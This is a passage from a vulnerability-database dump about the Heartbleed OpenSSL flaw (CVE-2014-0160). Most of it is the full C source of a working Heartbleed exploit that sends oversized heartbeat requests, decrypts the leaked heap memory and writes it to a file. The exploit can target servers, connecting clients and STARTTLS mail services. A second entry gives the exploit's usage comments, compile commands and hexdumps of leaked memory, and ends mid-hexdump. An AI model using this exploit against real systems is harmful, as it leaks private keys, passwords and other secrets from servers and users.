SSL_new(c->sslContext);\r\n if(c->sslHandle==NULL)\r\n ERR_print_errors_fp(stderr);\r\n if(!SSL_set_fd(c->sslHandle,c->socket))\r\n ERR_print_errors_fp(stderr);\r\n if(SSL_connect(c->sslHandle)!=1)\r\n ERR_print_errors_fp(stderr);\r\n if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\r\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\r\n printf("[ warning: heartbeat extension is unsupported (try anyway)\\n");\r\n }\r\n\treturn c;\r\n}\r\n\r\nconnection* tls_bind(int sd){\r\n\tint bytes;\r\n connection *c;\r\n char* buf;\r\n\tbuf = malloc(4096);\r\n if(buf==NULL){\r\n printf("[ error in malloc()\\n");\r\n exit(0);\r\n }\r\n\tmemset(buf,0,4096);\r\n\tc = malloc(sizeof(connection));\r\n\tif(c==NULL){\r\n printf("[ error in malloc()\\n");\r\n exit(0);\r\n }\r\n\tc->socket = sd;\r\n c->sslHandle = NULL;\r\n c->sslContext = NULL;\r\n c->sslContext = SSL_CTX_new(SSLv23_server_method());\r\n if(c->sslContext==NULL)\r\n ERR_print_errors_fp(stderr);\r\n\tSSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);\r\n\tSSL_CTX_SRP_CTX_init(c->sslContext);\r\n\tSSL_CTX_use_certificate_file(c->sslContext, "./server.crt", SSL_FILETYPE_PEM);\r\n\tSSL_CTX_use_PrivateKey_file(c->sslContext, "./server.key", SSL_FILETYPE_PEM); \r\n\tif(!SSL_CTX_check_private_key(c->sslContext)){\r\n\t\tprintf("[!] FATAL: private key does not match the certificate public key\\n");\r\n\t\texit(0);\r\n\t}\r\n\tc->sslHandle = SSL_new(c->sslContext);\r\n if(c->sslHandle==NULL)\r\n ERR_print_errors_fp(stderr);\r\n if(!SSL_set_fd(c->sslHandle,c->socket))\r\n ERR_print_errors_fp(stderr);\r\n int rc = SSL_accept(c->sslHandle);\r\n\tprintf ("[ SSL connection using %s\\n", SSL_get_cipher (c->sslHandle));\r\n\tbytes = SSL_read(c->sslHandle, buf, 4095);\r\n\tprintf("[ recieved: %d bytes - showing output\\n%s\\n[\\n",bytes,buf);\r\n\tif(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\r\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\r\n printf("[ warning: heartbeat extension is unsupported (try anyway)\\n");\r\n }\r\n return c;\r\n}\r\n\r\nint pre_cmd(int sd,int precmd,int verbose){\r\n\t/* this function can be used to send commands to a plain-text\r\n\tservice or client before heartbleed exploit attempt. e.g. STARTTLS */\r\n\tint rc, go = 0;\r\n\tchar* buffer;\r\n\tchar* line1;\r\n\tchar* line2; \r\n\tswitch(precmd){\r\n\t\tcase 0:\r\n\t\t\tline1 = "EHLO test\\n";\r\n\t\t\tline2 = "STARTTLS\\n";\r\n\t\t\tbreak;\r\n\t\tcase 1:\r\n\t\t\tline1 = "CAPA\\n";\r\n\t\t\tline2 = "STLS\\n";\r\n\t\t\tbreak;\r\n\t\tcase 2:\r\n\t\t\tline1 = "a001 CAPB\\n";\r\n\t\t\tline2 = "a002 STARTTLS\\n";\r\n\t\t\tbreak;\r\n\t\tdefault:\r\n\t\t\tgo = 1;\r\n\t\t\tbreak;\r\n\t}\r\n\tif(go==0){\r\n\t\tbuffer = malloc(2049);\r\n\t if(buffer==NULL){\r\n \tprintf("[ error in malloc()\\n");\r\n \texit(0);\r\n\t }\r\n\t\tmemset(buffer,0,2049);\r\n\t\trc = read(sd,buffer,2048);\r\n\t\tprintf("[ banner: %s",buffer);\r\n\t\tsend(sd,line1,strlen(line1),0);\r\n\t\tmemset(buffer,0,2049);\r\n\t\trc = read(sd,buffer,2048);\r\n\t\tif(verbose==1){\r\n\t\t\tprintf("%s\\n",buffer);\r\n\t\t}\r\n\t\tsend(sd,line2,strlen(line2),0);\r\n\t\tmemset(buffer,0,2049);\r\n\t\trc = read(sd,buffer,2048);\r\n\t\tif(verbose==1){\r\n\t\t\tprintf("%s\\n",buffer);\r\n\t\t}\r\n\t}\r\n\treturn sd;\r\n}\r\n\r\nvoid* heartbleed(connection *c,unsigned int type){\r\n\tunsigned char *buf, *p;\r\n int ret;\r\n\tbuf = OPENSSL_malloc(1 + 2);\r\n\tif(buf==NULL){\r\n printf("[ error in malloc()\\n");\r\n exit(0);\r\n }\r\n\tp = buf;\r\n *p++ = TLS1_HB_REQUEST;\r\n\tswitch(type){\r\n\t\tcase 0:\r\n\t\t\ts2n(0x0,p);\r\n\t\t\tbreak;\r\n\t\tcase 1:\r\n\t\t\ts2n(0xffff,p);\r\n\t\t\tbreak;\r\n\t\tdefault:\r\n\t\t\tprintf("[ setting heartbeat payload_length to %u\\n",type);\r\n\t\t\ts2n(type,p);\r\n\t\t\tbreak;\r\n\t}\r\n\tprintf("[ <3 <3 <3 heart bleed <3 <3 <3\\n");\r\n ret = ssl3_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3);\r\n OPENSSL_free(buf);\r\n\treturn c;\r\n}\r\n\r\nvoid* sneakyleaky(connection *c,char* filename, int verbose){\r\n\tchar *p;\r\n int ssl_major,ssl_minor,al;\r\n int enc_err,n,i;\r\n SSL3_RECORD *rr;\r\n SSL_SESSION *sess;\r\n\tSSL* s;\r\n unsigned char md[EVP_MAX_MD_SIZE];\r\n short version;\r\n unsigned mac_size, orig_len;\r\n size_t extra;\r\n rr= &(c->sslHandle->s3->rrec);\r\n sess=c->sslHandle->session;\r\n s = c->sslHandle;\r\n if (c->sslHandle->options & SSL_OP_MICROSOFT_BIG_SSLV3_BUFFER)\r\n extra=SSL3_RT_MAX_EXTRA;\r\n else\r\n extra=0;\r\n if ((s->rstate != SSL_ST_READ_BODY) ||\r\n (s->packet_length < SSL3_RT_HEADER_LENGTH)) {\r\n n=ssl3_read_n(s, SSL3_RT_HEADER_LENGTH, s->s3->rbuf.len, 0);\r\n if (n <= 0)\r\n goto apple; \r\n s->rstate=SSL_ST_READ_BODY;\r\n p=s->packet;\r\n rr->type= *(p++);\r\n ssl_major= *(p++);\r\n ssl_minor= *(p++);\r\n version=(ssl_major<<8)|ssl_minor;\r\n n2s(p,rr->length);\r\n\t\t\tif(rr->type==24){\r\n\t\t\t\tprintf("[ heartbeat returned type=%d length=%u\\n",rr->type, rr->length);\r\n\t\t\t\tif(rr->length > 16834){\r\n\t\t\t\t\tprintf("[ error: got a malformed TLS length.\\n");\r\n\t\t\t\t\texit(0);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\telse{\r\n\t\t\t\tprintf("[ incorrect record type=%d length=%u returned\\n",rr->type,rr->length);\r\n\t\t\t\ts->packet_length=0;\r\n\t\t\t\tbadpackets++;\r\n\t\t\t\tif(badpackets > 3){\r\n\t\t\t\t\tprintf("[ error: too many bad packets recieved\\n");\r\n\t\t\t\t\texit(0);\r\n\t\t\t\t}\r\n\t\t\t\tgoto apple;\r\n\t\t\t}\r\n }\r\n if (rr->length > s->packet_length-SSL3_RT_HEADER_LENGTH){\r\n i=rr->length;\r\n n=ssl3_read_n(s,i,i,1);\r\n if (n <= 0) goto apple; \r\n }\r\n\tprintf("[ decrypting SSL packet\\n");\r\n s->rstate=SSL_ST_READ_HEADER; \r\n rr->input= &(s->packet[SSL3_RT_HEADER_LENGTH]);\r\n rr->data=rr->input;\r\n tls1_enc(s,0);\r\n if((sess != NULL) &&\r\n (s->enc_read_ctx != NULL) &&\r\n (EVP_MD_CTX_md(s->read_hash) != NULL))\r\n {\r\n unsigned char *mac = NULL;\r\n unsigned char mac_tmp[EVP_MAX_MD_SIZE];\r\n mac_size=EVP_MD_CTX_size(s->read_hash);\r\n OPENSSL_assert(mac_size <= EVP_MAX_MD_SIZE);\r\n orig_len = rr->length+((unsigned int)rr->type>>8);\r\n if(orig_len < mac_size ||\r\n (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE &&\r\n orig_len < mac_size+1)){\r\n al=SSL_AD_DECODE_ERROR;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_LENGTH_TOO_SHORT);\r\n }\r\n if (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE){\r\n mac = mac_tmp;\r\n ssl3_cbc_copy_mac(mac_tmp, rr, mac_size, orig_len);\r\n rr->length -= mac_size;\r\n }\r\n else{\r\n rr->length -= mac_size;\r\n mac = &rr->data[rr->length];\r\n }\r\n i = tls1_mac(s,md,0);\r\n if (i < 0 || mac == NULL || CRYPTO_memcmp(md, mac, (size_t)mac_size) != 0)\r\n enc_err = -1;\r\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra+mac_size)\r\n enc_err = -1;\r\n }\r\n if(enc_err < 0){\r\n al=SSL_AD_BAD_RECORD_MAC;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC);\r\n goto apple;\r\n }\r\n if(s->expand != NULL){\r\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra) {\r\n al=SSL_AD_RECORD_OVERFLOW;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_COMPRESSED_LENGTH_TOO_LONG);\r\n goto apple;\r\n }\r\n if (!ssl3_do_uncompress(s)) {\r\n al=SSL_AD_DECOMPRESSION_FAILURE;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_BAD_DECOMPRESSION);\r\n goto apple;\r\n }\r\n }\r\n if (rr->length > SSL3_RT_MAX_PLAIN_LENGTH+extra) {\r\n al=SSL_AD_RECORD_OVERFLOW;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DATA_LENGTH_TOO_LONG);\r\n goto apple;\r\n }\r\n rr->off=0;\r\n s->packet_length=0;\r\n\tif(first==0){\r\n\t\tuint heartbleed_len = 0;\r\n\t\tchar* fp = s->s3->rrec.data;\r\n\t\t(long)fp++;\r\n\t\tmemcpy(&heartbleed_len,fp,2);\r\n\t\theartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8;\r\n\t\tfirst = 2;\r\n\t\tleakbytes = heartbleed_len + 16;\r\n\t\tprintf("[ heartbleed leaked length=%u\\n",heartbleed_len);\r\n\t}\r\n\tif(verbose==1){\r\n\t\t{ unsigned int z; for (z=0; z<rr->length; z++) printf("%02X%c",rr->data[z],((z+1)%16)?' ':'\\n'); }\r\n printf("\\n");\r\n }\r\n\tleakbytes-=rr->length;\r\n\tif(leakbytes > 0){\r\n\t\trepeat = 1;\r\n\t}\r\n\telse{\r\n\t\trepeat = 0;\r\n\t}\r\n\tprintf("[ final record type=%d, length=%u\\n", rr->type, rr->length);\r\n\tint output = s->s3->rrec.length-3;\r\n\tif(output > 0){\r\n\t\tint fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);\r\n\t if(first==2){\r\n\t\t\tfirst--;\r\n\t\t\twrite(fd,s->s3->rrec.data+3,s->s3->rrec.length);\r\n\t\t\t/* first three bytes are resp+len */\r\n\t\t\tprintf("[ wrote %d bytes of heap to file '%s'\\n",s->s3->rrec.length-3,filename);\r\n\t\t}\r\n\t\telse{\r\n\t\t\t/* heap data & 16 bytes padding */\r\n\t\t\twrite(fd,s->s3->rrec.data+3,s->s3->rrec.length);\r\n\t\t\tprintf("[ wrote %d bytes of heap to file '%s'\\n",s->s3->rrec.length,filename);\r\n\t\t}\r\n\t\tclose(fd);\r\n\t}\r\n\telse{\r\n\t\tprintf("[ nothing from the heap to write\\n");\r\n\t}\r\n\treturn;\r\napple:\r\n printf("[ problem handling SSL record packet - wrong type?\\n");\r\n\tbadpackets++;\r\n\tif(badpackets > 3){\r\n\t\tprintf("[ error: too many bad packets recieved\\n");\r\n\t\texit(0);\r\n\t}\r\n\treturn;\r\n}\r\n\r\nvoid usage(){\r\n\tprintf("[\\n");\r\n\tprintf("[ --server|-s <ip/dns> - the server to target\\n");\r\n\tprintf("[ --port|-p <port> - the port to target\\n");\r\n\tprintf("[ --file|-f <filename> - file to write data to\\n");\r\n\tprintf("[ --bind|-b <ip> - bind to ip for exploiting clients\\n");\r\n\tprintf("[ --precmd|-c <n> - send precmd buffer (STARTTLS)\\n");\r\n\tprintf("[\t\t\t 0 = SMTP\\n");\r\n\tprintf("[\t\t\t 1 = POP3\\n");\r\n\tprintf("[\t\t\t 2 = IMAP\\n");\r\n\tprintf("[ --loop|-l\t\t - loop the exploit attempts\\n");\r\n\tprintf("[ --type|-t <n> - select exploit to try\\n");\r\n\tprintf("[ 0 = null length\\n");\r\n\tprintf("[\t\t\t 1 = max leak\\n");\r\n\tprintf("[\t\t\t n = heartbeat payload_length\\n");\r\n\tprintf("[\\n");\r\n\tprintf("[ --verbose|-v - output leak to screen\\n");\r\n\tprintf("[ --help|-h - this output\\n");\r\n\tprintf("[\\n");\r\n\texit(0);\r\n}\r\n\r\nint main(int argc, char* argv[]){\r\n\tint ret, port, userc, index;\r\n\tint type = 1, udp = 0, verbose = 0, bind = 0, precmd = 9;\r\n\tint loop = 0;\r\n\tstruct hostent *h;\r\n\tconnection* c;\r\n\tchar *host, *file;\r\n\tint ihost = 0, iport = 0, ifile = 0, itype = 0, iprecmd = 0;\r\n\tprintf("[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\\n");\r\n\tprintf("[ =============================================================\\n");\r\n static struct option options[] = {\r\n \t{"server", 1, 0, 's'},\r\n\t {"port", 1, 0, 'p'},\r\n\t\t{"file", 1, 0, 'f'},\r\n\t\t{"type", 1, 0, 't'},\r\n\t\t{"bind", 1, 0, 'b'},\r\n\t\t{"verbose", 0, 0, 'v'},\r\n\t\t{"precmd", 1, 0, 'c'},\r\n\t\t{"loop", 0, 0, 'l'},\r\n\t\t{"help", 0, 0,'h'}\r\n };\r\n\twhile(userc != -1) {\r\n\t userc = getopt_long(argc,argv,"s:p:f:t:b:c:lvh",options,&index);\t\r\n \tswitch(userc) {\r\n \t\tcase -1:\r\n\t break;\r\n \t case 's':\r\n\t\t\t\tif(ihost==0){\r\n\t\t\t\t\tihost = 1;\r\n\t\t\t\t\th = gethostbyname(optarg);\t\t\t\t\r\n\t\t\t\t\tif(h==NULL){\r\n\t\t\t\t\t\tprintf("[!] FATAL: unknown host '%s'\\n",optarg);\r\n\t\t\t\t\t\texit(1);\r\n\t\t\t\t\t}\r\n\t\t\t\t\thost = malloc(strlen(optarg) + 1);\r\n\t\t\t\t\tif(host==NULL){\r\n \t\t\t\tprintf("[ error in malloc()\\n");\r\n\t\t\t\t exit(0);\r\n \t\t\t\t}\r\n\t\t\t\t\tsprintf(host,"%s",optarg);\r\n \t\t\t}\r\n\t\t\t\tbreak;\r\n\t case 'p':\r\n\t\t\t\tif(iport==0){\r\n\t\t\t\t\tport = atoi(optarg);\r\n\t\t\t\t\tiport = 1;\r\n\t\t\t\t}\r\n \t break;\r\n\t\t\tcase 'f':\r\n\t\t\t\tif(ifile==0){\r\n\t\t\t\t\tfile = malloc(strlen(optarg) + 1);\r\n\t\t\t\t\tif(file==NULL){\r\n\t\t\t\t printf("[ error in malloc()\\n");\r\n \t\t\t\texit(0);\r\n \t\t\t\t}\r\n\t\t\t\t\tsprintf(file,"%s",optarg);\r\n\t\t\t\t\tifile = 1;\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase 't':\r\n\t\t\t\tif(itype==0){\r\n\t\t\t\t\ttype = atoi(optarg);\r\n\t\t\t\t\titype = 1;\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'h':\r\n\t\t\t\tusage();\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'b':\r\n\t\t\t\tif(ihost==0){\r\n\t\t\t\t\tihost = 1;\r\n\t\t\t\t\thost = malloc(strlen(optarg)+1);\r\n\t\t\t\t\tif(host==NULL){\r\n\t\t\t \t printf("[ error in malloc()\\n");\r\n\t\t\t\t exit(0);\r\n\t\t\t\t }\r\n\t\t\t\t\tsprintf(host,"%s",optarg);\r\n\t\t\t\t\tbind = 1;\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'c':\r\n\t\t\t\tif(iprecmd == 0){\r\n\t\t\t\t\tiprecmd = 1;\r\n\t\t\t\t\tprecmd = atoi(optarg);\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'v':\r\n\t\t\t\tverbose = 1;\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'l':\r\n\t\t\t\tloop = 1;\r\n\t\t\t\tbreak;\r\n\t\t\tdefault:\r\n\t\t\t\tbreak;\r\n\t\t}\r\n\t}\r\n\tif(ihost==0||iport==0||ifile==0||itype==0||type < 0){\r\n\t\tprintf("[ try --help\\n");\r\n\t\texit(0);\r\n\t}\r\n\tssl_init();\r\n\tif(bind==0){\r\n\t\tret = tcp_connect(host, port);\r\n\t\tpre_cmd(ret, precmd, verbose);\r\n\t\tc = tls_connect(ret);\r\n\t\theartbleed(c,type);\r\n\t\twhile(repeat==1){\r\n\t\t\tsneakyleaky(c,file,verbose);\r\n\t\t}\r\n\t\twhile(loop==1){\r\n\t\t\tprintf("[ entered heartbleed loop\\n");\r\n\t\t\tfirst=0;\r\n\t\t\trepeat=1;\r\n\t\t\theartbleed(c,type);\r\n\t\t\twhile(repeat==1){\r\n\t\t\t\tsneakyleaky(c,file,verbose);\r\n\t\t\t}\r\n\t\t}\r\n\t\tprintf("[ done.\\n");\r\n\t\texit(0);\r\n\t}\r\n\telse{\r\n\t\tint sd, pid, i;\r\n\t\tret = tcp_bind(host, port);\r\n\t\twhile(1){\r\n \t\t\tsd=accept(ret,0,0);\r\n\t\t\tif(sd==-1){\r\n\t\t\t\tprintf("[!] FATAL: problem with accept()\\n");\r\n\t\t\t\texit(0);\r\n\t\t\t}\r\n\t\t\tif(pid=fork()){\r\n\t\t\t\tclose(sd);\r\n\t\t\t}\r\n \t\t\telse{\r\n\t\t\t\tc = tls_bind(sd);\r\n\t\t\t\tpre_cmd(ret, precmd, verbose);\r\n\t\t\t\theartbleed(c,type);\r\n\t\t\t\twhile(repeat==1){\r\n\t\t\t\t\tsneakyleaky(c,file,verbose);\r\n\t\t\t\t}\r\n\t\t\t\twhile(loop==1){\r\n\t\t\t\t\tprintf("[ entered heartbleed loop\\n");\r\n\t\t\t\t\tfirst=0;\r\n\t\t\t\t\trepeat=0;\r\n\t\t\t\t\theartbleed(c,type);\r\n\t\t\t\t\twhile(repeat==1){\r\n\t\t\t\t\t\tsneakyleaky(c,file,verbose);\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t\tprintf("[ done.\\n");\r\n\t\t\t\texit(0);\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n}\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-86061", "status": "cve,poc"}, {"lastseen": "2017-11-19T17:26:23", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "references": [], "description": "CVE ID:CVE-2014-0160\r\n\r\nIBM AIX\u662f\u4e00\u6b3e\u5546\u4e1a\u6027\u8d28\u7684\u64cd\u4f5c\u7cfb\u7edf\u3002\r\n\r\nIBM AIX\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nIBM AIX 6.x\r\nIBM AIX 7.x\n\u7528\u6237\u53ef\u53c2\u8003\u5982\u4e0b\u5382\u5546\u63d0\u4f9b\u7684\u5b89\u5168\u8865\u4e01\u4ee5\u4fee\u590d\u8be5\u6f0f\u6d1e\uff1a\r\nhttp://aix.software.ibm.com/aix/efixes/security/openssl_advisory7.doc\r\nhttp://www14.software.ibm.com/webapp/set2/subscriptions/onvdq?mode=18&ID=3489", "reporter": "Root", "published": "2014-04-16T00:00:00", "title": "IBM AIX OpenSSL TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2014-04-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62187", "id": "SSV:62187", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "", "status": "details"}], "packetstorm": [{"lastseen": "2016-12-05T22:13:48", "references": [], "edition": 1, "description": "", "reporter": "Ayman Sagy", "published": "2014-04-24T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "packetstorm", "title": "Heartbleed OpenSSL Information Leak Proof Of Concept", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-24T00:00:00", "href": "https://packetstormsecurity.com/files/126308/Heartbleed-OpenSSL-Information-Leak-Proof-Of-Concept.html", "id": "PACKETSTORM:126308", "sourceData": "`/* \n* CVE-2014-0160 heartbleed OpenSSL information leak exploit \n* ========================================================= \n* This exploit uses OpenSSL to create an encrypted connection \n* and trigger the heartbleed leak. The leaked information is \n* returned within encrypted SSL packets and is then decrypted \n* and wrote to a file to annoy IDS/forensics. The exploit can \n* set heartbeat payload length arbitrarily or use two preset \n* values for NULL and MAX length. The vulnerability occurs due \n* to bounds checking not being performed on a heap value which \n* is user supplied and returned to the user as part of DTLS/TLS \n* heartbeat SSL extension. All versions of OpenSSL 1.0.1 to \n* 1.0.1f are known affected. You must run this against a target \n* which is linked to a vulnerable OpenSSL library using DTLS/TLS. \n* This exploit leaks upto 65532 bytes of remote heap each request \n* and can be run in a loop until the connected peer ends connection. \n* The data leaked contains 16 bytes of random padding at the end. \n* The exploit can be used against a connecting client or server, \n* it can also send pre_cmd's to plain-text services to establish \n* an SSL session such as with STARTTLS on SMTP/IMAP/POP3. Clients \n* will often forcefully close the connection during large leak \n* requests so try to lower your payload request size. \n* \n* Compiled on ArchLinux x86_64 gcc 4.8.2 20140206 w/OpenSSL 1.0.1g \n* \n* E.g. \n* $ gcc -lssl -lssl3 -lcrypto heartbleed.c -o heartbleed \n* $ ./heartbleed -s 192.168.11.23 -p 443 -f out -t 1 \n* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit \n* [ ============================================================= \n* [ connecting to 192.168.11.23 443/tcp \n* [ connected to 192.168.11.23 443/tcp \n* [ <3 <3 <3 heart bleed <3 <3 <3 \n* [ heartbeat returned type=24 length=16408 \n* [ decrypting SSL packet \n* [ heartbleed leaked length=65535 \n* [ final record type=24, length=16384 \n* [ wrote 16381 bytes of heap to file 'out' \n* [ heartbeat returned type=24 length=16408 \n* [ decrypting SSL packet \n* [ final record type=24, length=16384 \n* [ wrote 16384 bytes of heap to file 'out' \n* [ heartbeat returned type=24 length=16408 \n* [ decrypting SSL packet \n* [ final record type=24, length=16384 \n* [ wrote 16384 bytes of heap to file 'out' \n* [ heartbeat returned type=24 length=16408 \n* [ decrypting SSL packet \n* [ final record type=24, length=16384 \n* [ wrote 16384 bytes of heap to file 'out' \n* [ heartbeat returned type=24 length=42 \n* [ decrypting SSL packet \n* [ final record type=24, length=18 \n* [ wrote 18 bytes of heap to file 'out' \n* [ done. \n* $ ls -al out \n* -rwx------ 1 fantastic fantastic 65554 Apr 11 13:53 out \n* $ hexdump -C out \n* - snip - snip \n* \n* Use following example command to generate certificates for clients. \n* \n* $ openssl req -x509 -nodes -days 365 -newkey rsa:2048 \\ \n* -keyout server.key -out server.crt \n* \n* Debian compile with \"gcc heartbleed.c -o heartbleed -Wl,-Bstatic \\ \n* -lssl -Wl,-Bdynamic -lssl3 -lcrypto\" \n* \n* todo: add udp/dtls support. \n* \n* - Hacker Fantastic \n* http://www.mdsec.co.uk \n* \n*/ \n \n/* Modified by Ayman Sagy aymansagy @ gmail.com - Added DTLS over UDP support \n* \n* use -u switch, tested against s_server/s_client version 1.0.1d \n* \n* # openssl s_server -accept 990 -cert ssl.crt -key ssl.key -dtls1 \n* ... \n* # ./heartbleed -s 192.168.75.235 -p 990 -f eshta -t 1 -u \n* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit \n* [ ============================================================= \n* [ <3 <3 <3 heart bleed <3 <3 <3 \n* [ heartbeat returned type=24 length=1392 \n* [ decrypting SSL packet \n* [ heartbleed leaked length=1336 \n* [ final record type=24, length=1355 \n* [ wrote 1352 bytes of heap to file 'eshta' \n* \n* \n* # hexdump -C eshta \n* 00000000 00 00 00 00 06 30 f1 95 08 00 00 00 00 00 00 00 |.....0..........| \n* 00000010 8c 43 64 ab e3 89 6b fd e3 d3 74 a1 a1 31 8c 35 |.Cd...k...t..1.5| \n* 00000020 09 6d b9 e7 08 08 08 08 08 08 08 08 08 a1 65 9f |.m............e.| \n* 00000030 ca 13 80 7c a5 88 b0 c9 d5 f6 7b 14 fe ff 00 00 |...|......{.....| \n* 00000040 00 00 00 00 00 03 00 01 01 16 fe ff 00 01 00 00 |................| \n* 00000050 00 00 00 00 00 40 b5 fd a5 10 da c4 fd fb c7 d2 |.....@..........| \n* 00000060 9f 0c 56 4b a9 9c 14 00 00 0c 00 03 00 00 00 00 |..VK............| \n* 00000070 00 0c 69 ec c4 d5 f3 38 ae e5 2e 3a 1a 32 f9 30 |..i....8...:.2.0| \n* 00000080 7f 61 4c 8c d7 34 f3 02 08 3f 68 01 a9 a7 81 55 |.aL..4...?h....U| \n* 00000090 01 c9 03 03 03 03 00 00 0e 31 39 32 2e 31 36 38 |.........192.168| \n* 000000a0 2e 37 35 2e 32 33 35 00 23 00 00 00 0f 00 01 01 |.75.235.#.......| \n* 000000b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| \n* \n* 00000530 00 00 00 00 00 00 00 00 a5 e2 f5 67 d6 23 85 49 |...........g.#.I| \n* 00000540 b3 cc ed c4 d2 74 c8 97 c1 b4 cc |.....t.....| \n* 0000054b \n* \n* \n* # openssl s_client -connect localhost:990 -dtls1 \n* ... \n* # ./heartbleed -b localhost -p 990 -u -t 1 -f eshta \n* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit \n* [ ============================================================= \n* [ SSL connection using AES256-SHA \n* [ <3 <3 <3 heart bleed <3 <3 <3 \n* [ heartbeat returned type=24 length=1392 \n* [ decrypting SSL packet \n* [ heartbleed leaked length=1336 \n* [ final record type=24, length=1355 \n* [ wrote 1352 bytes of heap to file 'eshta' \n* \n* \n* # hexdump -C eshta \n* 00000000 00 00 24 4e b7 00 00 00 00 00 00 00 00 18 00 00 |..$N............| \n* 00000010 cf d0 5f df c3 64 5f 58 79 17 f8 f7 22 9b 28 6e |.._..d_Xy...\".(n| \n* 00000020 c0 e7 d6 a3 08 08 08 08 08 08 08 08 08 9b c3 38 |...............8| \n* 00000030 2b 32 5f dd 3a d5 0f 83 51 02 2f 70 33 8f cf 82 |+2_.:...Q./p3...| \n* 00000040 21 5b cc 25 80 26 f3 29 c8 90 91 ec 5c 83 68 ee |![.%.&.)....\\.h.| \n* 00000050 6b 11 0d ad f1 f4 da 9e 13 59 8f 2a 74 f6 d4 35 |k........Y.*t..5| \n* 00000060 9e 17 12 7c 2b 6f 9e a8 1e b4 7a 3c a5 ec 18 e0 |...|+o....z<....| \n* 00000070 44 b2 51 e4 69 8c 47 29 39 fb 9e b0 dd 5b 05 4d |D.Q.i.G)9....[.M| \n* 00000080 db 11 06 7b 1d 08 58 60 ac 34 3f 2d d1 14 c1 b7 |...{..X`.4?-....| \n* 00000090 d5 08 59 73 16 28 f8 75 23 f7 85 27 48 be 1f 14 |..Ys.(.u#..'H...| \n* 000000a0 fe ff 00 00 00 00 00 00 00 04 00 01 01 16 fe ff |................| \n* 000000b0 00 01 00 00 00 00 00 00 00 40 62 1c 02 19 45 5f |.........@b...E_| \n* 000000c0 2c a6 89 95 d2 bf 16 c4 8b b7 14 00 00 0c 00 04 |,...............| \n* 000000d0 00 00 00 00 00 0c e9 fb 75 02 61 90 be 4d f7 82 |........u.a..M..| \n* 000000e0 06 d6 fd 6d 53 a1 d5 44 e0 5a 0d 6a 6a 94 ef e8 |...mS..D.Z.jj...| \n* 000000f0 4c 01 4b cb 86 73 03 03 03 03 2d 53 74 61 74 65 |L.K..s....-State| \n* 00000100 31 21 30 1f 06 03 55 04 0a 0c 18 49 6e 74 65 72 |1!0...U....Inter| \n* 00000110 6e 65 74 20 57 69 64 67 69 74 73 20 50 74 79 20 |net Widgits Pty | \n* 00000120 4c 74 64 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 |Ltd0..\"0...*.H..| \n* 00000130 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 |...........0....| \n* 00000140 82 01 01 00 c0 85 26 4a 9d cd f8 